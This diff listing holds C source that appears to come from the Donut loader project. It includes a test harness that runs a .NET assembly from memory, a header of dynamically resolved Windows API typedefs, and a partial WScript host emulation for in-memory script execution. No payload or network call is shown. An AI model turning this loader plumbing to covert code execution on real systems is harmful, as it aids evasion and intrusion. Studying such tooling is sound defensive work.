338 printf("MethodInfo::Invoke_3()\n");
339 hr = mi->Invoke_3(v1, NULL, &v2);
340 mi->Release();
341 }
342 as->Release();
343 }
344 SafeArrayDestroy(sa);
345 }
346 ad->Release();
347 }
348 iu->Release();
349 }
350 icrh->Stop();
351 }
352 icrh->Release();
353 }
354
355 int main(int argc, char *argv[])
356 {
357 void *mem;
358 struct stat fs;
359 FILE *fd;
360
361 if(argc != 2) {
362 printf("usage: rundotnet <.NET assembly>\n");
363 return 0;
364 }
365
366 // 1. get the size of file
367 stat(argv[1], &fs);
368
369 if(fs.st_size == 0) {
370 printf("file is empty.\n");
371 return 0;
372 }
373
374 // 2. try open assembly
375 fd = fopen(argv[1], "rb");
376 if(fd == NULL) {
377 printf("unable to open \"%s\".\n", argv[1]);
378 return 0;
379 }
380 // 3. allocate memory
381 mem = malloc(fs.st_size);
382 if(mem != NULL) {
383 // 4. read file into memory
384 fread(mem, 1, fs.st_size, fd);
385 // 5. run the program from memory
386 rundotnet(mem, fs.st_size);
387 // 6. free memory
388 free(mem);
389 }
390 // 7. close assembly
391 fclose(fd);
392
393 return 0;
394 }
395
396 /**
397 sav = SafeArrayCreateVector(VT_UNKNOWN, 0, 1);
398 BSTR i32 = SysAllocString(L"System.Int32");
399
400 as2->GetType_2(i32, &ptr);
401 idx = 0;
402 SafeArrayPutElement(sav, &idx, ptr);
403
404 BSTR alloc = SysAllocString(L"AllocHGlobal");
405 BSTR marshal = SysAllocString(L"System.Runtime.InteropServices.Marshal");
406 hr = as1->GetType_2(marshal, &mars);
407
408 hr = mars->GetMethod(alloc,
409 (mscorlib::BindingFlags)
410 (mscorlib::BindingFlags_Static | mscorlib::BindingFlags_Public),
411 NULL, // Binder
412 sav, // SAFEARRAY(_Type*)
413 NULL, // Modifiers
414 &mi); // MethodInfo
415
416 printf("System.Runtime.InteropServices.Marshal.GetMethod(AllocCoTaskMem) : %lx\n", hr);
417
418 sav = SafeArrayCreateVector(VT_VARIANT, 0, 1);
419 idx = 0;
420 V_VT(&v_type) = VT_I4;
421 V_I4(&v_type) = 0x12345678;
422 SafeArrayPutElement(sav, &idx, &v_type);
423
424 v1.vt = VT_EMPTY;
425 VariantClear(&ret);
426
427 printf("Press any key to continue...\n");
428 getchar();
429
430 printf("Calling AllocCoTaskMem\n");
431 hr = mi->Invoke_3(
432 v1,
433 sav, // arguments to method
434 &ret); // return value from method
435
436 printf("%lx %p\n", hr, (LPVOID)V_BYREF(&ret));
437 getchar();
438 return;
439 */
+501
-0
loader/winapi.h less more
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 #ifndef WINAPI_H
32 #define WINAPI_H
33
34 #include <windows.h>
35
36 typedef void (WINAPI *Sleep_t)(DWORD dwMilliseconds);
37
38 typedef int (WINAPI *MultiByteToWideChar_t)(
39 UINT CodePage,
40 DWORD dwFlags,
41 LPCCH lpMultiByteStr,
42 int cbMultiByte,
43 LPWSTR lpWideCharStr,
44 int cchWideChar);
45
46 typedef int (WINAPI *WideCharToMultiByte_t)(
47 UINT CodePage,
48 DWORD dwFlags,
49 LPCWCH lpWideCharStr,
50 int cchWideChar,
51 LPSTR lpMultiByteStr,
52 int cbMultiByte,
53 LPCCH lpDefaultChar,
54 LPBOOL lpUsedDefaultChar);
55
56 typedef LPWSTR* (WINAPI *CommandLineToArgvW_t)(LPCWSTR lpCmdLine, int* pNumArgs);
57
58 // imports from shlwapi.dll
59 typedef LSTATUS (WINAPI *SHGetValueA_t)(
60 HKEY hkey,
61 LPCSTR pszSubKey,
62 LPCSTR pszValue,
63 DWORD *pdwType,
64 void *pvData,
65 DWORD *pcbData);
66
67 // imports from mscoree.dll
68 typedef HRESULT (WINAPI *CLRCreateInstance_t)(
69 REFCLSID clsid,
70 REFIID riid,
71 LPVOID *ppInterface);
72
73 typedef HRESULT (WINAPI *CorBindToRuntime_t) (
74 LPCWSTR pwszVersion,
75 LPCWSTR pwszBuildFlavor,
76 REFCLSID rclsid,
77 REFIID riid,
78 LPVOID FAR *ppv);
79
80 // imports from ole32.dll
81 typedef HRESULT (WINAPI *CoInitializeEx_t)(
82 LPVOID pvReserved,
83 DWORD dwCoInit);
84
85 typedef void (WINAPI *CoUninitialize_t)(void);
86
87 typedef HRESULT (WINAPI *CoCreateInstance_t)(
88 REFCLSID rclsid,
89 LPUNKNOWN pUnkOuter,
90 DWORD dwClsContext,
91 REFIID riid,
92 LPVOID *ppv);
93
94 typedef HRESULT (WINAPI *CreateStdDispatch_t)(
95 IUnknown *punkOuter,
96 void *pvThis,
97 ITypeInfo *ptinfo,
98 IUnknown **ppunkStdDisp);
99
100 typedef HRESULT (WINAPI *CreateErrorInfo_t)(
101 ICreateErrorInfo **pperrinfo);
102
103 typedef HRESULT (WINAPI *CreateDispTypeInfo_t)(
104 INTERFACEDATA *pidata,
105 LCID lcid,
106 ITypeInfo **pptinfo);
107
108 typedef HRESULT (WINAPI *GetErrorInfo_t)(
109 ULONG dwReserved,
110 IErrorInfo **pperrinfo);
111
112 typedef HRESULT (WINAPI *LoadTypeLib_t)(
113 LPCOLESTR szFile,
114 ITypeLib **pptlib);
115
116 typedef HRESULT (WINAPI *LoadTypeLibEx_t)(
117 LPCOLESTR szFile,
118 REGKIND regkind,
119 ITypeLib **pptlib);
120
121 typedef LCID (WINAPI *GetUserDefaultLCID_t)(VOID);
122
123 // imports from oleaut32.dll
124 typedef HRESULT (WINAPI *SafeArrayGetLBound_t)(
125 SAFEARRAY *psa,
126 UINT nDim,
127 LONG *plLbound);
128
129 typedef HRESULT (WINAPI *SafeArrayGetUBound_t)(
130 SAFEARRAY *psa,
131 UINT nDim,
132 LONG *plUbound);
133
134 typedef SAFEARRAY* (WINAPI *SafeArrayCreate_t)(
135 VARTYPE vt,
136 UINT cDims,
137 SAFEARRAYBOUND *rgsabound);
138
139 typedef SAFEARRAY* (WINAPI *SafeArrayCreateVector_t)(
140 VARTYPE vt,
141 LONG lLbound,
142 ULONG cElements);
143
144 typedef HRESULT (WINAPI *SafeArrayPutElement_t)(
145 SAFEARRAY *psa,
146 LONG *rgIndices,
147 void *pv);
148
149 typedef HRESULT (WINAPI *SafeArrayDestroy_t)(
150 SAFEARRAY *psa);
151
152 typedef BSTR (WINAPI *SysAllocString_t)(
153 const OLECHAR *psz);
154
155 typedef void (WINAPI *SysFreeString_t)(
156 BSTR bstrString);
157
158 // imports from kernel32.dll
159 typedef HMODULE (WINAPI *LoadLibraryA_t)(
160 LPCSTR lpLibFileName);
161
162 typedef FARPROC (WINAPI *GetProcAddress_t)(
163 HMODULE hModule,
164 LPCSTR lpProcName);
165
166 typedef BOOL (WINAPI *AllocConsole_t)(void);
167
168 typedef BOOL (WINAPI *AttachConsole_t)(
169 DWORD dwProcessId);
170
171 typedef BOOL (WINAPI *SetConsoleCtrlHandler_t)(
172 PHANDLER_ROUTINE HandlerRoutine,
173 BOOL Add);
174
175 typedef HANDLE (WINAPI *GetStdHandle_t)(
176 DWORD nStdHandle);
177
178 typedef BOOL (WINAPI *SetStdHandle_t)(
179 DWORD nStdHandle,
180 HANDLE hHandle);
181
182 typedef HANDLE (WINAPI *CreateFileA_t)(
183 LPCSTR lpFileName,
184 DWORD dwDesiredAccess,
185 DWORD dwShareMode,
186 LPSECURITY_ATTRIBUTES lpSecurityAttributes,
187 DWORD dwCreationDisposition,
188 DWORD dwFlagsAndAttributes,
189 HANDLE hTemplateFile);
190
191 typedef HANDLE (WINAPI *CreateEventA_t)(
192 LPSECURITY_ATTRIBUTES lpEventAttributes,
193 BOOL bManualReset,
194 BOOL bInitialState,
195 LPCSTR lpName);
196
197 typedef BOOL (WINAPI *CloseHandle_t)(HANDLE hObject);
198
199 typedef BOOL (WINAPI *SetEvent_t)(HANDLE hEvent);
200
201 typedef DWORD (WINAPI *GetCurrentThreadId_t)(VOID);
202
203 typedef DWORD (WINAPI *GetCurrentProcessId_t)(VOID);
204
205 typedef HHOOK (WINAPI *SetWindowsHookExA_t)(
206 int idHook,
207 HOOKPROC lpfn,
208 HINSTANCE hmod,
209 DWORD dwThreadId);
210
211 typedef BOOL (WINAPI *CreateProcessA_t)(
212 LPCSTR lpApplicationName,
213 LPSTR lpCommandLine,
214 LPSECURITY_ATTRIBUTES lpProcessAttributes,
215 LPSECURITY_ATTRIBUTES lpThreadAttributes,
216 BOOL bInheritHandles,
217 DWORD dwCreationFlags,
218 LPVOID lpEnvironment,
219 LPCSTR lpCurrentDirectory,
220 LPSTARTUPINFOA lpStartupInfo,
221 LPPROCESS_INFORMATION lpProcessInformation);
222
223 typedef DWORD (WINAPI *WaitForSingleObject_t)(
224 HANDLE hHandle,
225 DWORD dwMilliseconds);
226
227 // imports from wininet.dll
228 typedef BOOL (WINAPI *InternetCrackUrl_t)(
229 LPCSTR lpszUrl,
230 DWORD dwUrlLength,
231 DWORD dwFlags,
232 LPURL_COMPONENTS lpUrlComponents);
233
234 typedef HINTERNET (WINAPI *InternetOpen_t)(
235 LPCSTR lpszAgent,
236 DWORD dwAccessType,
237 LPCSTR lpszProxy,
238 LPCSTR lpszProxyBypass,
239 DWORD dwFlags);
240
241 typedef HINTERNET (WINAPI *InternetConnect_t)(
242 HINTERNET hInternet,
243 LPCSTR lpszServerName,
244 INTERNET_PORT nServerPort,
245 LPCSTR lpszUserName,
246 LPCSTR lpszPassword,
247 DWORD dwService,
248 DWORD dwFlags,
249 DWORD_PTR dwContext);
250
251 typedef HINTERNET (WINAPI *HttpOpenRequest_t)(
252 HINTERNET hConnect,
253 LPCSTR lpszVerb,
254 LPCSTR lpszObjectName,
255 LPCSTR lpszVersion,
256 LPCSTR lpszReferrer,
257 LPCSTR *lplpszAcceptTypes,
258 DWORD dwFlags,
259 DWORD_PTR dwContext);
260
261 typedef BOOL (WINAPI *InternetSetOption_t)(
262 HINTERNET hInternet,
263 DWORD dwOption,
264 LPVOID lpBuffer,
265 DWORD dwBufferLength);
266
267 typedef BOOL (WINAPI *HttpSendRequest_t)(
268 HINTERNET hRequest,
269 LPCSTR lpszHeaders,
270 DWORD dwHeadersLength,
271 LPVOID lpOptional,
272 DWORD dwOptionalLength);
273
274 typedef BOOL (WINAPI *HttpQueryInfo_t)(
275 HINTERNET hRequest,
276 DWORD dwInfoLevel,
277 LPVOID lpBuffer,
278 LPDWORD lpdwBufferLength,
279 LPDWORD lpdwIndex);
280
281 typedef BOOL (WINAPI *InternetReadFile_t)(
282 HINTERNET hFile,
283 LPVOID lpBuffer,
284 DWORD dwNumberOfBytesToRead,
285 LPDWORD lpdwNumberOfBytesRead);
286
287 typedef BOOL (WINAPI *InternetCloseHandle_t)(
288 HINTERNET hInternet);
289
290 typedef BOOL (WINAPI *CryptAcquireContext_t)(
291 HCRYPTPROV *phProv,
292 LPCSTR szContainer,
293 LPCSTR szProvider,
294 DWORD dwProvType,
295 DWORD dwFlags);
296
297 typedef void (WINAPI *GetSystemInfo_t)(
298 LPSYSTEM_INFO lpSystemInfo);
299
300 typedef SIZE_T (WINAPI *VirtualQuery_t)(
301 LPCVOID lpAddress,
302 PMEMORY_BASIC_INFORMATION lpBuffer,
303 SIZE_T dwLength);
304
305 typedef BOOL (WINAPI *VirtualProtect_t)(
306 LPVOID lpAddress,
307 SIZE_T dwSize,
308 DWORD flNewProtect,
309 PDWORD lpflOldProtect);
310
311 typedef HMODULE (WINAPI *GetModuleHandleA_t)(
312 LPCSTR lpModuleName);
313
314 typedef HMODULE (WINAPI *LoadLibraryExA_t)(
315 LPCSTR lpLibFileName,
316 HANDLE hFile,
317 DWORD dwFlags);
318
319 typedef HMODULE (WINAPI *LoadLibraryExW_t)(
320 LPCWSTR lpLibFileName,
321 HANDLE hFile,
322 DWORD dwFlags);
323
324 typedef BOOL (WINAPI *CryptStringToBinaryA_t)(
325 LPCSTR pszString,
326 DWORD cchString,
327 DWORD dwFlags,
328 BYTE *pbBinary,
329 DWORD *pcbBinary,
330 DWORD *pdwSkip,
331 DWORD *pdwFlags);
332
333 typedef BOOL (WINAPI *CryptDecodeObjectEx_t)(
334 DWORD dwCertEncodingType,
335 LPCSTR lpszStructType,
336 const BYTE *pbEncoded,
337 DWORD cbEncoded,
338 DWORD dwFlags,
339 PCRYPT_DECODE_PARA pDecodePara,
340 void *pvStructInfo,
341 DWORD *pcbStructInfo);
342
343 typedef BOOL (WINAPI *CryptImportPublicKeyInfo_t)(
344 HCRYPTPROV hCryptProv,
345 DWORD dwCertEncodingType,
346 PCERT_PUBLIC_KEY_INFO pInfo,
347 HCRYPTKEY *phKey);
348
349 typedef BOOL (WINAPI *CryptCreateHash_t)(
350 HCRYPTPROV hProv,
351 ALG_ID Algid,
352 HCRYPTKEY hKey,
353 DWORD dwFlags,
354 HCRYPTHASH *phHash);
355
356 typedef BOOL (WINAPI *CryptHashData_t)(
357 HCRYPTHASH hHash,
358 const BYTE *pbData,
359 DWORD dwDataLen,
360 DWORD dwFlags);
361
362 typedef BOOL (WINAPI *CryptVerifySignature_t)(
363 HCRYPTHASH hHash,
364 const BYTE *pbSignature,
365 DWORD dwSigLen,
366 HCRYPTKEY hPubKey,
367 LPCSTR szDescription,
368 DWORD dwFlags);
369
370 typedef BOOL (WINAPI *CryptDestroyHash_t)(
371 HCRYPTHASH hHash);
372
373 typedef BOOL (WINAPI *CryptDestroyKey_t)(
374 HCRYPTKEY hKey);
375
376 typedef BOOL (WINAPI *CryptReleaseContext_t)(
377 HCRYPTPROV hProv,
378 DWORD dwFlags);
379
380 typedef LPVOID (WINAPI *VirtualAlloc_t)(
381 LPVOID lpAddress,
382 SIZE_T dwSize,
383 DWORD flAllocationType,
384 DWORD flProtect);
385
386 typedef BOOL (WINAPI *VirtualFree_t)(
387 LPVOID lpAddress,
388 SIZE_T dwSize,
389 DWORD dwFreeType);
390
391 typedef HLOCAL (WINAPI *LocalFree_t)(
392 HLOCAL hMem);
393
394 typedef HRSRC (WINAPI *FindResource_t)(
395 HMODULE hModule,
396 LPCSTR lpName,
397 LPCSTR lpType);
398
399 typedef HGLOBAL (WINAPI *LoadResource_t)(
400 HMODULE hModule,
401 HRSRC hResInfo);
402
403 typedef LPVOID (WINAPI *LockResource_t)(
404 HGLOBAL hResData);
405
406 typedef DWORD (WINAPI *SizeofResource_t)(
407 HMODULE hModule,
408 HRSRC hResInfo);
409
410 typedef void (WINAPI *RtlZeroMemory_t)(
411 LPVOID Destination,
412 SIZE_T Length);
413
414 typedef BOOL (WINAPI *RtlEqualUnicodeString_t)(
415 PUNICODE_STRING String1,
416 PUNICODE_STRING String2,
417 BOOLEAN CaseInSensitive);
418
419 typedef BOOL (WINAPI *RtlEqualString_t)(
420 const ANSI_STRING * String1,
421 const ANSI_STRING * String2,
422 BOOLEAN CaseInSensitive);
423
424 typedef NTSTATUS (WINAPI *RtlUnicodeStringToAnsiString_t)(
425 PANSI_STRING DestinationString,
426 PUNICODE_STRING SourceString,
427 BOOLEAN AllocateDestinationString);
428
429 typedef void (WINAPI *RtlInitUnicodeString_t)(
430 PUNICODE_STRING DestinationString,
431 PCWSTR SourceString);
432
433 typedef void (WINAPI *RtlExitUserThread_t)(UINT uExitCode);
434
435 typedef void (WINAPI *RtlExitUserProcess_t)(NTSTATUS ExitStatus);
436
437 typedef HANDLE (WINAPI *CreateThread_t)(
438 LPSECURITY_ATTRIBUTES lpThreadAttributes,
439 SIZE_T dwStackSize,
440 LPTHREAD_START_ROUTINE lpStartAddress,
441 LPVOID lpParameter,
442 DWORD dwCreationFlags,
443 LPDWORD lpThreadId);
444
445 typedef BOOL (WINAPI *RtlCreateUnicodeString_t)(
446 PUNICODE_STRING DestinationString,
447 PCWSTR SourceString);
448
449 typedef NTSTATUS (WINAPI *RtlGetCompressionWorkSpaceSize_t)(
450 USHORT CompressionFormatAndEngine,
451 PULONG CompressBufferWorkSpaceSize,
452 PULONG CompressFragmentWorkSpaceSize);
453
454 typedef NTSTATUS (WINAPI *RtlCompressBuffer_t)(
455 USHORT CompressionFormatAndEngine,
456 PUCHAR UncompressedBuffer,
457 ULONG UncompressedBufferSize,
458 PUCHAR CompressedBuffer,
459 ULONG CompressedBufferSize,
460 ULONG UncompressedChunkSize,
461 PULONG FinalCompressedSize,
462 PVOID WorkSpace);
463
464 typedef NTSTATUS (WINAPI *RtlDecompressBuffer_t)(
465 USHORT CompressionFormatAndEngine,
466 PUCHAR UncompressedBuffer,
467 ULONG UncompressedBufferSize,
468 PUCHAR CompressedBuffer,
469 ULONG CompressedBufferSize,
470 PULONG FinalUncompressedSize);
471
472 typedef NTSTATUS (WINAPI *RtlDecompressBufferEx_t)(
473 USHORT CompressionFormatAndEngine,
474 PUCHAR UncompressedBuffer,
475 ULONG UncompressedBufferSize,
476 PUCHAR CompressedBuffer,
477 ULONG CompressedBufferSize,
478 PULONG FinalUncompressedSize,
479 PVOID WorkSpace);
480
481 typedef NTSTATUS (WINAPI *RtlUserThreadStart_t)(
482 LPTHREAD_START_ROUTINE lpStartAddress,
483 LPVOID lpParameter);
484
485 typedef NTSTATUS (WINAPI *NtContinue_t)(
486 PCONTEXT ContextRecord,
487 BOOLEAN TestAlert);
488
489 typedef BOOL (WINAPI *SetThreadContext_t)(
490 HANDLE hThread,
491 const CONTEXT *lpContext);
492
493 typedef BOOL (WINAPI *GetThreadContext_t)(
494 HANDLE hThread,
495 LPCONTEXT lpContext);
496
497 typedef HANDLE (WINAPI *GetCurrentThread_t)(VOID);
498 #endif
499
500
+343
-0
loader/wscript.c less more
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 // initialize interface with methods/properties
32 static HRESULT Host_New(PDONUT_INSTANCE inst, IHost *host) {
33 HRESULT hr;
34 WCHAR buf[DONUT_MAX_NAME+1];
35
36 // IUnknown interface
37 host->lpVtbl->QueryInterface = ADR(LPVOID, Host_QueryInterface);
38 host->lpVtbl->AddRef = ADR(LPVOID, Host_AddRef);
39 host->lpVtbl->Release = ADR(LPVOID, Host_Release);
40
41 // IDispatch interface
42 host->lpVtbl->GetTypeInfoCount = ADR(LPVOID, Host_GetTypeInfoCount);
43 host->lpVtbl->GetTypeInfo = ADR(LPVOID, Host_GetTypeInfo);
44 host->lpVtbl->GetIDsOfNames = ADR(LPVOID, Host_GetIDsOfNames);
45 host->lpVtbl->Invoke = ADR(LPVOID, Host_Invoke);
46
47 // IHost interface
48 host->lpVtbl->get_Name = ADR(LPVOID, Host_get_Name);
49 host->lpVtbl->get_Application = ADR(LPVOID, Host_get_Application);
50 host->lpVtbl->get_FullName = ADR(LPVOID, Host_get_FullName);
51 host->lpVtbl->get_Path = ADR(LPVOID, Host_get_Path);
52 host->lpVtbl->get_Interactive = ADR(LPVOID, Host_get_Interactive);
53 host->lpVtbl->put_Interactive = ADR(LPVOID, Host_put_Interactive);
54 host->lpVtbl->Quit = ADR(LPVOID, Host_Quit);
55 host->lpVtbl->get_ScriptName = ADR(LPVOID, Host_get_ScriptName);
56 host->lpVtbl->get_ScriptFullName = ADR(LPVOID, Host_get_ScriptFullName);
57 host->lpVtbl->get_Arguments = ADR(LPVOID, Host_get_Arguments);
58 host->lpVtbl->get_Version = ADR(LPVOID, Host_get_Version);
59 host->lpVtbl->get_BuildVersion = ADR(LPVOID, Host_get_BuildVersion);
60 host->lpVtbl->get_Timeout = ADR(LPVOID, Host_get_Timeout);
61 host->lpVtbl->put_Timeout = ADR(LPVOID, Host_put_Timeout);
62 host->lpVtbl->CreateObject = ADR(LPVOID, Host_CreateObject);
63 host->lpVtbl->Echo = ADR(LPVOID, Host_Echo);
64 host->lpVtbl->GetObject = ADR(LPVOID, Host_GetObject);
65 host->lpVtbl->DisconnectObject = ADR(LPVOID, Host_DisconnectObject);
66 host->lpVtbl->Sleep = ADR(LPVOID, Host_Sleep);
67 host->lpVtbl->ConnectObject = ADR(LPVOID, Host_ConnectObject);
68 host->lpVtbl->get_StdIn = ADR(LPVOID, Host_get_StdIn);
69 host->lpVtbl->get_StdOut = ADR(LPVOID, Host_get_StdOut);
70 host->lpVtbl->get_StdErr = ADR(LPVOID, Host_get_StdErr);
71
72 host->m_cRef = 0;
73 host->inst = inst;
74
75 DPRINT("LoadTypeLib(\"%s\")", inst->wscript_exe);
76 ansi2unicode(inst, inst->wscript_exe, buf);
77 hr = inst->api.LoadTypeLib(buf, &host->lpTypeLib);
78
79 if(hr == S_OK) {
80 DPRINT("ITypeLib::GetTypeInfoOfGuid");
81
82 hr = host->lpTypeLib->lpVtbl->GetTypeInfoOfGuid(
83 host->lpTypeLib, &inst->xIID_IHost, &host->lpTypeInfo);
84 }
85 DPRINT("HRESULT : %08lx", hr);
86 return hr;
87 }
88
89 // Queries a COM object for a pointer to one of its interface.
90 static HRESULT WINAPI Host_QueryInterface(IHost *iface, REFIID riid, void **ppv) {
91 DPRINT("WScript::QueryInterface");
92
93 if(ppv == NULL) return E_POINTER;
94
95 // we implement the following interfaces
96 if(IsEqualIID(&iface->inst->xIID_IUnknown, riid) ||
97 IsEqualIID(&iface->inst->xIID_IDispatch, riid) ||
98 IsEqualIID(&iface->inst->xIID_IHost, riid))
99 {
100 *ppv = iface;
101 return S_OK;
102 }
103 *ppv = NULL;
104 return E_NOINTERFACE;
105 }
106
107 // Increments the reference count for an interface pointer to a COM object.
108 static ULONG WINAPI Host_AddRef(IHost *iface) {
109 DPRINT("WScript::AddRef");
110
111 _InterlockedIncrement(&iface->m_cRef);
112 return iface->m_cRef;
113 }
114
115 // Decrements the reference count for an interface on a COM object.
116 static ULONG WINAPI Host_Release(IHost *iface) {
117 DPRINT("WScript::Release");
118
119 ULONG ref = _InterlockedDecrement(&iface->m_cRef);
120 return ref;
121 }
122
123 // Retrieves the number of type information interfaces that an object provides (either 0 or 1).
124 static HRESULT WINAPI Host_GetTypeInfoCount(IHost *iface, UINT *pctinfo) {
125 DPRINT("WScript::GetTypeInfoCount");
126
127 if(pctinfo == NULL) return E_POINTER;
128
129 *pctinfo = 1;
130 return S_OK;
131 }
132
133 // Retrieves the type information for an object, which can then be used to get the type information for an interface.
134 static HRESULT WINAPI Host_GetTypeInfo(IHost *iface, UINT iTInfo, LCID lcid, ITypeInfo **ppTInfo) {
135 DPRINT("WScript::GetTypeInfo");
136
137 if(ppTInfo == NULL) return E_POINTER;
138
139 iface->lpTypeInfo->lpVtbl->AddRef(iface->lpTypeInfo);
140 *ppTInfo = iface->lpTypeInfo;
141
142 return S_OK;
143 }
144
145 // Maps a single member and an optional set of argument names to a corresponding set of integer DISPIDs,
146 // which can be used on subsequent calls to Invoke.
147 static HRESULT WINAPI Host_GetIDsOfNames(IHost *iface, REFIID riid,
148 LPOLESTR *rgszNames, UINT cNames, LCID lcid, DISPID *rgDispId) {
149 DPRINT("WScript::GetIDsOfNames");
150
151 return iface->lpTypeInfo->lpVtbl->GetIDsOfNames(iface->lpTypeInfo, rgszNames, cNames, rgDispId);
152 }
153
154 // Provides access to properties and methods exposed by an object.
155 // The dispatch function DispInvoke provides a standard implementation of Invoke.
156 static HRESULT WINAPI Host_Invoke(
157 IHost *iface, DISPID dispIdMember, REFIID riid,
158 LCID lcid, WORD wFlags, DISPPARAMS *pDispParams, VARIANT *pVarResult,
159 EXCEPINFO *pExcepInfo, UINT *puArgErr) {
160
161 DPRINT("WScript::Invoke");
162
163 HRESULT hr = iface->lpTypeInfo->lpVtbl->Invoke(
164 iface->lpTypeInfo, iface, dispIdMember, wFlags, pDispParams,
165 pVarResult, pExcepInfo, puArgErr);
166
167 DPRINT("HRESULT : %08lx", hr);
168
169 return hr;
170 }
171
172 // Returns the name of the WScript object (the host executable file).
173 static HRESULT WINAPI Host_get_Name(IHost *iface, BSTR *out_Name) {
174 DPRINT("WScript::Name");
175
176 return S_OK;
177 }
178
179 static HRESULT WINAPI Host_get_Application(IHost *iface, IDispatch **out_Dispatch) {
180 DPRINT("WScript::Application");
181
182 return E_NOTIMPL;
183 }
184
185 // Returns the fully qualified path of the host executable (CScript.exe or WScript.exe).
186 static HRESULT WINAPI Host_get_FullName(IHost *iface, BSTR *out_Path) {
187 DPRINT("WScript::FullName");
188
189 return E_NOTIMPL;
190 }
191
192 static HRESULT WINAPI Host_get_Path(IHost *iface, BSTR *out_Path) {
193 DPRINT("WScript::Path");
194
195 return E_NOTIMPL;
196 }
197
198 // Gets the script mode, or identifies the script mode.
199 static HRESULT WINAPI Host_get_Interactive(IHost *iface, VARIANT_BOOL *out_Interactive) {
200 DPRINT("WScript::get_Interactive");
201
202 return E_NOTIMPL;
203 }
204
205 // Sets the script mode, or identifies the script mode.
206 static HRESULT WINAPI Host_put_Interactive(IHost *iface, VARIANT_BOOL v) {
207 DPRINT("WScript::put_Interactive");
208
209 return E_NOTIMPL;
210 }
211
212 // Forces script execution to stop at any time.
213 static HRESULT WINAPI Host_Quit(IHost *iface, int ExitCode) {
214 DPRINT("WScript::Quit(%i)", ExitCode);
215
216 // if you know of a better way to do this..let me know.
217 iface->lpEngine->lpVtbl->InterruptScriptThread(iface->lpEngine, SCRIPTTHREADID_CURRENT, NULL, 0);
218
219 return S_OK;
220 }
221
222 // Returns the file name of the currently running script.
223 static HRESULT WINAPI Host_get_ScriptName(IHost *iface, BSTR *out_ScriptName) {
224 DPRINT("WScript::ScriptName");
225
226 return E_NOTIMPL;
227 }
228
229 // Returns the full path of the currently running script.
230 static HRESULT WINAPI Host_get_ScriptFullName(IHost *iface, BSTR *out_ScriptFullName) {
231 DPRINT("WScript::ScriptFullName");
232
233 return E_NOTIMPL;
234 }
235
236 // Returns the WshArguments object (a collection of arguments).
237 static HRESULT WINAPI Host_get_Arguments(
238 IHost *iface, void **out_Arguments) { // IArguments2
239 DPRINT("WScript::Arguments");
240
241 return E_NOTIMPL;
242 }
243
244 static HRESULT WINAPI Host_get_Version(IHost *iface, BSTR *out_Version) {
245 DPRINT("WScript::Version");
246
247 return E_NOTIMPL;
248 }
249
250 // Returns the Windows Script Host build version number.
251 static HRESULT WINAPI Host_get_BuildVersion(IHost *iface, int *out_Build) {
252 DPRINT("WScript::BuildVersion");
253
254 return E_NOTIMPL;
255 }
256
257 static HRESULT WINAPI Host_get_Timeout(IHost *iface, LONG *out_Timeout) {
258 DPRINT("WScript::get_Timeout");
259
260 return E_NOTIMPL;
261 }
262
263 static HRESULT WINAPI Host_put_Timeout(IHost *iface, LONG v) {
264 DPRINT("WScript::put_Timeout");
265
266 return E_NOTIMPL;
267 }
268
269 // Connects the object's event sources to functions with a given prefix.
270 static HRESULT WINAPI Host_CreateObject(IHost *iface, BSTR ProgID, BSTR Prefix,
271 IDispatch **out_Dispatch) {
272 DPRINT("WScript::CreateObject");
273
